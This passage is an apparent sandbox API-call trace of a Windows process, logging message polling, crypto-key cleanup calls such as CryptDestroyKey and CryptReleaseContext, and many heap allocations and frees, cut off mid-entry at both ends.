wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.192] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.192] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.192] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.194] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.194] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.194] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0244.194] PeekMessageW (in: lpMsg=0x87f754, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f754) returned 0 [0244.194] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.194] PeekMessageW (in: lpMsg=0x87f104, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f104) returned 0 [0244.195] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.195] CryptDestroyKey (hKey=0xc31d08) returned 1 [0244.195] PeekMessageW (in: lpMsg=0x87f754, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f754) returned 0 [0244.195] PeekMessageW (in: lpMsg=0x87f754, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f754) returned 0 [0244.195] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0244.195] PeekMessageW (in: lpMsg=0x87f4fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f4fc) returned 0 [0244.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0244.195] PeekMessageW (in: lpMsg=0x87f2a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2a4) returned 0 [0244.195] PeekMessageW (in: lpMsg=0x87f2a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2a4) returned 0 [0244.195] PeekMessageW (in: lpMsg=0x87f4fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f4fc) returned 0 [0244.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.195] PeekMessageW (in: lpMsg=0x87f0dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f0dc) returned 0 [0244.196] PeekMessageW (in: lpMsg=0x87f4fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f4fc) returned 0 [0244.196] PeekMessageW (in: lpMsg=0x87f4fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f4fc) returned 0 [0244.196] PeekMessageW (in: lpMsg=0x87f754, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f754) returned 0 [0244.196] PeekMessageW (in: lpMsg=0x87f754, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f754) returned 0 [0244.196] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.196] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0244.196] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.196] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0244.196] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0244.196] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0244.196] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.196] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.196] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0244.196] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.197] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.197] PeekMessageW (in: lpMsg=0x87f3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3ec) returned 0 [0244.197] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0244.197] PeekMessageW (in: lpMsg=0x87f3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3ec) returned 0 [0244.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.197] CryptReleaseContext (hProv=0x9c1ae0, dwFlags=0x0) returned 1 [0244.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e23f0 [0244.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e94f8 [0244.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9c8238 [0244.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c82c8 [0244.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8010 [0244.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c83b8 [0244.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2380 [0244.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c83b8 | out: hHeap=0x8a0000) returned 1 [0244.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2380 | out: hHeap=0x8a0000) returned 1 [0244.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8010 | out: hHeap=0x8a0000) returned 1 [0244.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8010 [0244.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c83b8 [0244.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8190 [0244.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2380 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8190 | out: hHeap=0x8a0000) returned 1 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2380 | out: hHeap=0x8a0000) returned 1 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c83b8 | out: hHeap=0x8a0000) returned 1 [0244.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c83b8 [0244.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8190 [0244.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7fe0 [0244.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2380 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7fe0 | out: hHeap=0x8a0000) returned 1 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2380 | out: hHeap=0x8a0000) returned 1 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8190 | out: hHeap=0x8a0000) returned 1 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2280 | out: hHeap=0x8a0000) returned 1 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e21a0 | out: hHeap=0x8a0000) returned 1 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2f150 | out: hHeap=0x8a0000) returned 1 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8418 | out: hHeap=0x8a0000) returned 1 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c80 | out: hHeap=0x8a0000) returned 1 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8040 | out: hHeap=0x8a0000) returned 1 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c84c0 | out: hHeap=0x8a0000) returned 1 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c81a8 | out: hHeap=0x8a0000) returned 1 [0244.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8160 | out: hHeap=0x8a0000) returned 1 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c84f0 | out: hHeap=0x8a0000) returned 1 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c80d0 | out: hHeap=0x8a0000) returned 1 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c81c0 | out: hHeap=0x8a0000) returned 1 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c68 | out: hHeap=0x8a0000) returned 1 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c80a0 | out: hHeap=0x8a0000) returned 1 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8118 | out: hHeap=0x8a0000) returned 1 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2f128 | out: hHeap=0x8a0000) returned 1 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c82c8 | out: hHeap=0x8a0000) returned 1 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8010 | out: hHeap=0x8a0000) returned 1 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c83b8 | out: hHeap=0x8a0000) returned 1 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8238 | out: hHeap=0x8a0000) returned 1 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e94f8 | out: hHeap=0x8a0000) returned 1 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23f0 | out: hHeap=0x8a0000) returned 1 [0244.199] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2f128 [0244.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8238 [0244.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e23f0 [0244.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2330 [0244.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0xa3d460 [0244.199] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d460 | out: hHeap=0x8a0000) returned 1 [0244.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9c83b8 [0244.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db060 [0244.200] PeekMessageW (in: lpMsg=0x87f3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3ec) returned 0 [0244.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2330 [0244.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e21a0 [0244.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e21a0 | out: hHeap=0x8a0000) returned 1 [0244.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db060 | out: hHeap=0x8a0000) returned 1 [0244.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c83b8 | out: hHeap=0x8a0000) returned 1 [0244.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23f0 | out: hHeap=0x8a0000) returned 1 [0244.200] FreeLibrary (hLibModule=0x74f20000) returned 1 [0244.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8238 | out: hHeap=0x8a0000) returned 1 [0244.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2f128 | out: hHeap=0x8a0000) returned 1 [0244.200] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc31d08 | out: hHeap=0x8a0000) returned 1 [0244.200] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7f8 | out: hHeap=0x8a0000) returned 1 [0244.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c50 | out: hHeap=0x8a0000) returned 1 [0244.200] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e23f0 [0244.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2330 [0244.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e21a0 [0244.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1150 [0244.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e21a0 | out: hHeap=0x8a0000) returned 1 [0244.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1150 | out: hHeap=0x8a0000) returned 1 [0244.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23f0 | out: hHeap=0x8a0000) returned 1 [0244.201] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e23f0 [0244.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2330 [0244.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e21a0 [0244.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1150 [0244.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e21a0 | out: hHeap=0x8a0000) returned 1 [0244.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1150 | out: hHeap=0x8a0000) returned 1 [0244.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23f0 | out: hHeap=0x8a0000) returned 1 [0244.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2f128 [0244.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9c7c50 [0244.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9c8238 [0244.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9c83b8 [0244.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8010 [0244.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9c82c8 [0244.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9c8118 [0244.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2f150 [0244.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c80a0 [0244.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e23f0 [0244.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23f0 | out: hHeap=0x8a0000) returned 1 [0244.202] CloseHandle (hObject=0x698) returned 1 [0244.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c81d8 | out: hHeap=0x8a0000) returned 1 [0244.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0244.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc784d0 | out: hHeap=0x8a0000) returned 1 [0244.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc423d8 | out: hHeap=0x8a0000) returned 1 [0244.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8070 | out: hHeap=0x8a0000) returned 1 [0244.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2360 | out: hHeap=0x8a0000) returned 1 [0244.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ef98 | out: hHeap=0x8a0000) returned 1 [0244.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c80a0 | out: hHeap=0x8a0000) returned 1 [0244.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2f150 | out: hHeap=0x8a0000) returned 1 [0244.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c50 | out: hHeap=0x8a0000) returned 1 [0244.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8238 | out: hHeap=0x8a0000) returned 1 [0244.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8010 | out: hHeap=0x8a0000) returned 1 [0244.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c83b8 | out: hHeap=0x8a0000) returned 1 [0244.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c82c8 | out: hHeap=0x8a0000) returned 1 [0244.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8118 | out: hHeap=0x8a0000) returned 1 [0244.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2f128 | out: hHeap=0x8a0000) returned 1 [0244.209] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2360 [0244.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2f128 [0244.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8118 [0244.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24c0 [0244.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0244.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c82c8 [0244.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24c0 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0244.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c83b8 [0244.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24c0 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8118 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c82c8 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c83b8 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2f128 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2360 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7b0 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba480 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5a0 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ed68 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7f68 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2350 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba690 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ed40 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2510 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e7f0 | out: hHeap=0x8a0000) returned 1 [0244.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5e8 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2520 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2dfa8 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3a8 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2edb8 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1910 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ed90 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba660 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba030 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf348 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e660 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4b0 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba450 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e908 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e750 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4c8 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e6b0 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2dff8 | out: hHeap=0x8a0000) returned 1 [0244.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba510 | out: 